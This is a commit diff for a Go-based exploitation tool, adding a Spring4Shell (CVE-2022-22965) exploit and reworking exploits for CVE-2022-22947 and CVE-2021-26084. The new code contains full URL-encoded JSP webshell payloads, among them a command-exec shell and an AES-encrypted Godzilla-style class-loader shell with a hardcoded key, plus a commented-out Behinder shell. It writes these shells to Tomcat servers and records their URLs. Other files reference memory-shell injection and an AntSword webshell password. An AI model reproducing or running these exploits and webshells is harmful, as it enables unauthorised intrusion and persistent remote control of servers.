支持CVE-2022-22965漏洞

Author: SummerSec

cmd/commons/core/options.go

@@ -52,7 +52,7 @@ func ParseOptions() *Options {
 	options := &Options{}
 	flag.IntVar(&options.Mode, "m", 0, "debug mode off (debug mode = 1) default mode = 0")
 	flag.IntVar(&options.Thread, "t", 1, "threads number ")
-	flag.StringVar(&options.File, "f", "", "file to read example: -file=test.txt  http(s)://host:port/ (notes: The last line must be empty)")
+	flag.StringVar(&options.File, "f", "", "file to read example: -file=test.txt  http(s)://host:port/path/ (notes: The last line must be empty)")
 	flag.StringVar(&options.Url, "u", "", "url to read example: -url=http://www.baidu.com:80/")
 	flag.StringVar(&options.Proxy, "proxy", "", "proxy example: -proxy=http(socks5)://127.0.0.1:8080 ")
 	flag.BoolVar(&options.Version, "version", false, "show version")

cmd/commons/poc/2021/CVE-2021-26084.go

@@ -40,7 +40,7 @@ func (p CVE202126084) SendPoc(target string, hashmap map[string]interface{}) {
 
 	resp := utils.Send(reqmap)
 
-	if p.CheckExp(resp, target, file) {
+	if p.CheckExp(resp, target, hashmap) {
 		context := target + " 存在CVE-2021-26084漏洞！" + target + "testAnt.jsp 蚁剑密码 ant "
 		log.Info(context)
 		p.SaveResult(target, file)
@@ -56,7 +56,7 @@ func (CVE202126084) SaveResult(target string, file string) {
 	utils.SaveToFile(target, file)
 }
 
-func (CVE202126084) CheckExp(resp *req.Response, target string, file string) bool {
+func (CVE202126084) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
 	if !resp.IsSuccess() {
 		log.Debugf(resp.Dump())
 		return true

cmd/commons/poc/2022/CVE-2022-22947.go

@@ -87,17 +87,17 @@ func (p CVE202222947) SendPoc(target string, hashmap map[string]interface{}) {
 		reqmap["method"] = "POST"
 		utils.Send(reqmap)
 
-		if p.CheckExp(resp, target, hashmap["Out"].(string)) {
+		if p.CheckExp(resp, target, hashmap) {
 			log.Info("[+] Successful exploitation CVE-2020-222947")
 			p.SaveResult(target, hashmap["Out"].(string))
 			break
-		} else if !p.CheckExp(resp, target, hashmap["Out"].(string)) {
+		} else if !p.CheckExp(resp, target, hashmap) {
 			// NettyMemshell.doInject()
 			id = utils.GetCode(6)
 			s := fmt.Sprintf(payload, id, NettyMemshell)
 			reqmap["body"] = s
 			f++
-		} else if !p.CheckExp(resp, target, hashmap["Out"].(string)) {
+		} else if !p.CheckExp(resp, target, hashmap) {
 			// SpringRequestMappingMemshell.doInject()
 			id = utils.GetCode(6)
 			s := fmt.Sprintf(payload, id, SpringRequestMappingMemshell)
@@ -117,11 +117,15 @@ func (CVE202222947) init() {
 }
 
 // 检查是否成功
-func (p CVE202222947) CheckExp(resp *req.Response, url string, file string) bool {
+func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[string]interface{}) bool {
 	res := resp.Dump()
+	file := hashmap["Out"].(string)
+	y := utils.EncodeString("route_id")
+
 	log.Debugf("[+] res:%s", res)
 	if strings.Contains(res, "route_id") {
-		re, _ := req.R().SetQueryString("cmd=echo route_id").SetHeader("X-CMD", "echo route_id").Send("GET", url)
+		qustr := "echo " + y + "|base64 -d"
+		re, _ := req.R().SetQueryString("cmd="+qustr).SetHeader("X-CMD", qustr).Send("GET", url)
 		res2 := re.String()
 		log.Debugf("[+] res2:%s", res2)
 		if strings.Contains(res2, "route_id") {

cmd/commons/poc/2022/CVE-2022-22963.go

@@ -47,7 +47,7 @@ func (p CVE202222963) SendPoc(target string, hashmap map[string]interface{}) {
 
 	res := dnslog.GetDnslog()
 	if res {
-		if p.CheckExp(resp, target, hashmap["Out"].(string)) {
+		if p.CheckExp(resp, target, hashmap) {
 			log.Infof("[+] %s: %s", target, "CVE-2022-22963")
 			p.SaveResult(target, hashmap["Out"].(string))
 		}
@@ -65,7 +65,7 @@ func (CVE202222963) SaveResult(target string, file string) {
 	utils.SaveToFile(context, file)
 }
 
-func (p CVE202222963) CheckExp(resp *req.Response, dnslog string, file string) bool {
+func (p CVE202222963) CheckExp(resp *req.Response, dnslog string, hashmap map[string]interface{}) bool {
 	log.Debugf("CVE-2022-22963 checkExp")
 	return true
 

cmd/commons/poc/2022/CVE-2022-22965.go

@@ -6,49 +6,112 @@ import (
 	"github.com/fatih/structs"
 	"github.com/imroc/req/v3"
 	log "github.com/sirupsen/logrus"
+	"net/url"
+	"time"
 )
 
 type CVE202222965 struct{}
 
+const (
+	body    = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
+	context = "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
+	//body1   = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix="
+	body1 = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=G:\\source\\spring-framework-rce\\target\\spring_framework_rce-0.0.1-SNAPSHOT\\&class.module.classLoader.resources.context.parent.pipeline.first.prefix="
+	// 添加 shell 文件名
+	body2 = "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
+	//behinder = "%25%7Bprefix%7Di%20%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%7Bsuffix%7Di%20%25%7Bprefix%7Di%20!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%7Bsuffix%7Di%25%7Bprefix%7Di%20if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%7Bsuffix%7Di"
+
+	// 哥斯拉 pass key
+	beichen        = "%25%7Bprefix%7Di!%20String%20xc%3D%223c6e0b8a9c15224a%22%3B%20class%20X%20extends%20ClassLoader%7Bpublic%20X(ClassLoader%20z)%7Bsuper(z)%3B%7Dpublic%20Class%20Q(byte%5B%5D%20cb)%7Breturn%20super.defineClass(cb%2C%200%2C%20cb.length)%3B%7D%20%7Dpublic%20byte%5B%5D%20x(byte%5B%5D%20s%2Cboolean%20m)%7B%20try%7Bjavax.crypto.Cipher%20c%3Djavax.crypto.Cipher.getInstance(%22AES%22)%3Bc.init(m%3F1%3A2%2Cnew%20javax.crypto.spec.SecretKeySpec(xc.getBytes()%2C%22AES%22))%3Breturn%20c.doFinal(s)%3B%20%7Dcatch%20(Exception%20e)%7Breturn%20null%3B%20%7D%7D%25%7Bsuffix%7Di%25%7Bprefix%7Ditry%7Bbyte%5B%5D%20data%3Dnew%20byte%5BInteger.parseInt(request.getHeader(%22Content-Length%22))%5D%3Bjava.io.InputStream%20inputStream%3D%20request.getInputStream()%3Bint%20_num%3D0%3Bwhile%20((_num%2B%3DinputStream.read(data%2C_num%2Cdata.length))%3Cdata.length)%3Bdata%3Dx(data%2C%20false)%3Bif%20(session.getAttribute(%22payload%22)%3D%3Dnull)%7Bsession.setAttribute(%22payload%22%2Cnew%20X(this.getClass().getClassLoader()).Q(data))%3B%7Delse%7Brequest.setAttribute(%22parameters%22%2C%20data)%3BObject%20f%3D((Class)session.getAttribute(%22payload%22)).newInstance()%3Bjava.io.ByteArrayOutputStream%20arrOut%3Dnew%20java.io.ByteArrayOutputStream()%3Bf.equals(arrOut)%3Bf.equals(pageContext)%3Bf.toString()%3Bresponse.getOutputStream().write(x(arrOut.toByteArray()%2C%20true))%3B%7D%20%7Dcatch%20(Exception%20e)%7B%7D%25%7Bsuffix%7Di"
+	file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
+	pattern_data   = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
+)
+
 func (p CVE202222965) SendPoc(target string, hashmap map[string]interface{}) {
+	shellname := utils.GetCode(6)
+	time.Sleep(time.Second * 1)
+	shellname1 := utils.GetCode(8)
+	log.Debugf("shellname: %s", shellname)
+	log.Debugf("shellname1: %s", shellname1)
+	payload1 := body + context + body1 + shellname + body2
+	rebeyond := body + beichen + body1 + shellname1 + body2
 	//TODO implement me
 	log.Debugf("[+] Running CVE202222965 poc")
 	reqinfo := req2.NewReqInfo()
 	reqmap := structs.Map(reqinfo)
-	headers := map[string]string{
-		"suffix":     "%>//",
-		"c1":         "Runtime",
-		"c2":         "<%",
+	get_headers := map[string]string{
+		"suffix":     "%>",
+		"c":          "Runtime",
+		"prefix":     "<%",
 		"User-Agent": utils.GetUA(),
 	}
-	reqmap["url"] = target
+	post_get_headers := map[string]string{
+		"User-Agent":   utils.GetUA(),
+		"Content-Type": "application/x-www-form-urlencoded",
+	}
 
-	reqmap["headers"] = headers
+	reqmap["url"] = target
 
-	reqmap["method"] = "POST"
 	// 默认配置
 	reqmap["timeout"] = hashmap["Timeout"].(int)
 	reqmap["retry"] = hashmap["Retry"].(int)
 	reqmap["proxy"] = hashmap["Proxy"].(string)
 	reqmap["mode"] = hashmap["Mode"].(int)
+	f := 0
+	for f < 2 {
+		time.Sleep(time.Second * 1)
+		//  设置 payload
+		reqmap["method"] = "POST"
+		reqmap["body"] = file_date_data
+		reqmap["headers"] = post_get_headers
+		utils.Send(reqmap)
 
-	// 发送请求
-	resp := utils.Send(reqmap)
-	p.CheckExp(resp, target, hashmap["Out"].(string))
+		if f == 0 {
+			// 第二个请求
+			//reqmap["body"] = payload1
+			reqmap["body"] = rebeyond
+			reqmap["headers"] = post_get_headers
 
+		} else {
+			reqmap["body"] = payload1
+			reqmap["headers"] = post_get_headers
+		}
+		utils.Send(reqmap)
+		// Changes take some time to populate on tomcat
+		time.Sleep(time.Second * 3)
+
+		r, _ := url.Parse(target)
+		log.Debugf("[+] CVE202222965 poc success")
+		res := r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" + "?cmd=whoami or" + r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp 哥斯拉 pass key "
+		p.SaveResult(res, hashmap["Out"].(string))
+
+		// 第三个请求
+		reqmap["method"] = "GET"
+		reqmap["body"] = ""
+		reqmap["headers"] = get_headers
+		utils.Send(reqmap)
+
+		time.Sleep(time.Second * 1)
+		reqmap["body"] = pattern_data
+		reqmap["method"] = "POST"
+		reqmap["headers"] = post_get_headers
+		utils.Send(reqmap)
+		f++
+	}
 }
 
 func (p CVE202222965) SaveResult(target string, file string) {
-	context := target + "   存在CVE-2022-22965漏洞\n"
-	err := utils.SaveToFile(context, file)
+	err := utils.SaveToFile(target, file)
 	if err != nil {
 		log.Debugf("[-] Save result failed")
 		log.Debugf(err.Error())
 		return
 	}
 }
 
-func (p CVE202222965) CheckExp(resp *req.Response, target string, file string) bool {
-	//TODO implement me
-	panic("implement me")
+func (p CVE202222965) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
+	if resp.IsSuccess() {
+		return true
+	}
+	return false
 }

cmd/commons/poc/PoC.go

@@ -6,5 +6,5 @@ import "github.com/imroc/req/v3"
 type PoC interface {
 	SendPoc(target string, hashmap map[string]interface{})
 	SaveResult(target string, file string)
-	CheckExp(resp *req.Response, target string, file string) bool
+	CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool
 }

cmd/commons/poc/demo.go

@@ -48,7 +48,7 @@ func (d Demo) SendPoc(target string, hashmap map[string]interface{}) {
 	log.Debugln("[+] resp: ", resp.Dump())
 
 	// TODO check exp
-	d.CheckExp(resp, target, hashmap["Out"].(string))
+	d.CheckExp(resp, target, hashmap)
 
 	// TODO 保存结果
 	d.SaveResult(target, hashmap["Out"].(string))
@@ -68,7 +68,7 @@ func (d Demo) SaveResult(target, file string) {
 
 }
 
-func (d Demo) CheckExp(resp *req.Response, target string, file string) bool {
+func (d Demo) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
 	log.Debugf("[+] check exp")
 	return false
 }

cmd/main.go

@@ -11,8 +11,9 @@ func main() {
 	if options.Url != "" {
 
 	} else if options.File != "" {
-
 	} else if options.IP != "" {
+	} else if options.SP {
+		return
 	} else {
 		log.Info("No url, file or ip specified")
 		return

cmd/test/Strings.go

@@ -29,4 +29,7 @@ func main() {
 	ds := strings.Split(d, ",")
 	fmt.Println(ds)
 
+	y := utils.EncodeString("asdasd")
+	fmt.Println(y)
+
 }